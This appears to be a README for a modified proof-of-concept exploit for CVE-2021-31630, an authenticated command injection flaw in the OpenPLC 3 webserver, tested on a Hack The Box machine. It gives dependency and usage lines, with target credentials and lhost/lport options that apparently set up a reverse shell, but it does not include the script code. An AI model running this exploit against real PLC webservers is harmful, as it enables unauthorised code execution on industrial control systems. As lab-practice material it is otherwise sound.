# CVE-2021-31630
OpenPLC 3 WebServer Authenticated Remote Code Execution.

# Description
The presence of Command Injection in Open PLC Webserver v3 enables remote attackers to run arbitrary code. Only tested in HTB Wifinetictwo.htb machine.

I found problems with all the scripts that exploited the vulnerability, maybe because I'm using parrot or my browser, chromium works for login, I had login problems with Firefox and something strange happens to the web server with the POST request to log in.
I have modified the script from [thewhiteh4t]( there are parts (mainly upload method) that are just copied, but I have changed the part that obtains the cookies from the server to launch the exploit.

The original PoC is provided by [Fellipe Oliveira](

I hope it helps you if you have problems with it.

## Dependencies
pip3 install requests

## Usage
python3 http://10.129.x.x:8080 user pass --lhost 10.10.x.x --lport xxxx

Alternative, yo can modify
# LHOST y LPORT defaults
LHOST = ''
LPORT = '4444'

python3 http://10.129.x.x:8080 user pass